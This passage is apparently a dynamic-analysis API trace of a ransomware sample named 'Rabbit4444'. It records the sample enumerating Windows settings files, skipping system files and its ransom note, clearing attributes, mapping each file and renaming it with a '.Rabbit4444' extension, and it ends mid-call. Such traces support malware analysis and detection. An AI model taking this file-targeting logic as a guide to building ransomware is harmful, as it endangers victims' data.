param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms.Rabbit4444") returned 192 [0058.432] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.432] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45d45ba4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x45d45ba4, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23183f67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms", cAlternateFileName="CLD575~1.SET")) returned 1 [0058.432] lstrcmpiW (lpString1="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.432] lstrcmpiW (lpString1="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.432] lstrcmpiW (lpString1="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.432] lstrcmpiW (lpString1="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms", lpString2=".") returned 1 [0058.432] lstrcmpiW (lpString1="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms", lpString2="..") returned 1 [0058.432] lstrcmpiW (lpString1="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms", lpString2="windows") returned -1 [0058.432] lstrcmpiW (lpString1="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.432] lstrcmpiW (lpString1="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.432] lstrcmpiW (lpString1="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms", lpString2="boot") returned 1 [0058.433] lstrcmpiW (lpString1="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.433] lstrcmpiW (lpString1="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.433] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms" | out: lpString1="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms") returned="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms" [0058.433] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.433] lstrlenW (lpString="Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms") returned 64 [0058.433] lstrlenW (lpString="Rabbit4444") returned 10 [0058.433] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.433] lstrlenW (lpString=".dll") returned 4 [0058.433] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.433] lstrlenW (lpString=".lnk") returned 4 [0058.433] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.433] lstrlenW (lpString=".ini") returned 4 [0058.433] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.433] lstrlenW (lpString=".sys") returned 4 [0058.433] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.433] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1928da28-c5a7-4f13-af81-8238d57a793f}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.433] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.433] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14974416832) returned 1 [0058.433] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1232) returned 1 [0058.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0058.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0058.434] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0058.435] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0058.436] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.436] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.436] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.436] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.436] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.436] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.436] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.436] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.437] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14974729263) returned 1 [0058.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0058.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0058.437] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.437] CloseHandle (hObject=0x298) returned 1 [0058.437] CloseHandle (hObject=0x278) returned 1 [0058.437] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms.Rabbit4444") returned 192 [0058.437] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1928da28-c5a7-4f13-af81-8238d57a793f}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1928da28-c5a7-4f13-af81-8238d57a793f}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.438] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45ee95e5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x45ee95e5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x221b864e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x382, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms", cAlternateFileName="CL41D9~1.SET")) returned 1 [0058.438] lstrcmpiW (lpString1="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.438] lstrcmpiW (lpString1="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.438] lstrcmpiW (lpString1="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.438] lstrcmpiW (lpString1="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms", lpString2=".") returned 1 [0058.438] lstrcmpiW (lpString1="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms", lpString2="..") returned 1 [0058.438] lstrcmpiW (lpString1="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms", lpString2="windows") returned -1 [0058.438] lstrcmpiW (lpString1="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.438] lstrcmpiW (lpString1="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.438] lstrcmpiW (lpString1="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms", lpString2="boot") returned 1 [0058.438] lstrcmpiW (lpString1="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.438] lstrcmpiW (lpString1="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.438] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms" | out: lpString1="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms") returned="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms" [0058.438] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.438] lstrlenW (lpString="Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms") returned 64 [0058.438] lstrlenW (lpString="Rabbit4444") returned 10 [0058.438] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.438] lstrlenW (lpString=".dll") returned 4 [0058.438] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.438] lstrlenW (lpString=".lnk") returned 4 [0058.438] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.438] lstrlenW (lpString=".ini") returned 4 [0058.438] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.438] lstrlenW (lpString=".sys") returned 4 [0058.439] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.439] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.439] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.439] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14975097707) returned 1 [0058.440] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=898) returned 1 [0058.441] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0058.441] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0058.441] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x690, lpName=0x0) returned 0x298 [0058.442] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x690) returned 0x70000 [0058.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.442] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.443] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.443] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.443] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.443] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14975359735) returned 1 [0058.443] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0058.443] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0058.443] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.443] CloseHandle (hObject=0x298) returned 1 [0058.443] CloseHandle (hObject=0x278) returned 1 [0058.443] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms.Rabbit4444") returned 192 [0058.443] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.444] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4608cf94, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4608cf94, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23078eee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms", cAlternateFileName="CLBF51~1.SET")) returned 1 [0058.444] lstrcmpiW (lpString1="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.444] lstrcmpiW (lpString1="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.444] lstrcmpiW (lpString1="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.444] lstrcmpiW (lpString1="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms", lpString2=".") returned 1 [0058.444] lstrcmpiW (lpString1="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms", lpString2="..") returned 1 [0058.444] lstrcmpiW (lpString1="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms", lpString2="windows") returned -1 [0058.444] lstrcmpiW (lpString1="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.444] lstrcmpiW (lpString1="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.444] lstrcmpiW (lpString1="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms", lpString2="boot") returned 1 [0058.444] lstrcmpiW (lpString1="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.444] lstrcmpiW (lpString1="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.444] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms" | out: lpString1="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms") returned="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms" [0058.444] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.444] lstrlenW (lpString="Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms") returned 64 [0058.444] lstrlenW (lpString="Rabbit4444") returned 10 [0058.445] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.445] lstrlenW (lpString=".dll") returned 4 [0058.445] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.445] lstrlenW (lpString=".lnk") returned 4 [0058.445] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.445] lstrlenW (lpString=".ini") returned 4 [0058.445] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.445] lstrlenW (lpString=".sys") returned 4 [0058.445] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.445] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1a5712e4-aad7-4717-b22a-cf0b8438e2e6}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.445] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.445] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14975579367) returned 1 [0058.445] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=991) returned 1 [0058.445] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.445] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0058.445] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0058.446] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0058.447] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.447] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0058.447] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.447] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.447] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.447] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.447] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.448] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0058.448] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14975829914) returned 1 [0058.448] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.448] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0058.448] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.448] CloseHandle (hObject=0x298) returned 1 [0058.448] CloseHandle (hObject=0x278) returned 1 [0058.448] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms.Rabbit4444") returned 192 [0058.448] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1a5712e4-aad7-4717-b22a-cf0b8438e2e6}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1a5712e4-aad7-4717-b22a-cf0b8438e2e6}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.449] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x461be230, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x461be230, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2222ad59, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms", cAlternateFileName="CL9EA1~1.SET")) returned 1 [0058.449] lstrcmpiW (lpString1="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.449] lstrcmpiW (lpString1="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.449] lstrcmpiW (lpString1="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.449] lstrcmpiW (lpString1="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms", lpString2=".") returned 1 [0058.449] lstrcmpiW (lpString1="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms", lpString2="..") returned 1 [0058.449] lstrcmpiW (lpString1="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms", lpString2="windows") returned -1 [0058.449] lstrcmpiW (lpString1="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.449] lstrcmpiW (lpString1="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.449] lstrcmpiW (lpString1="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms", lpString2="boot") returned 1 [0058.449] lstrcmpiW (lpString1="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.449] lstrcmpiW (lpString1="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.449] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms" | out: 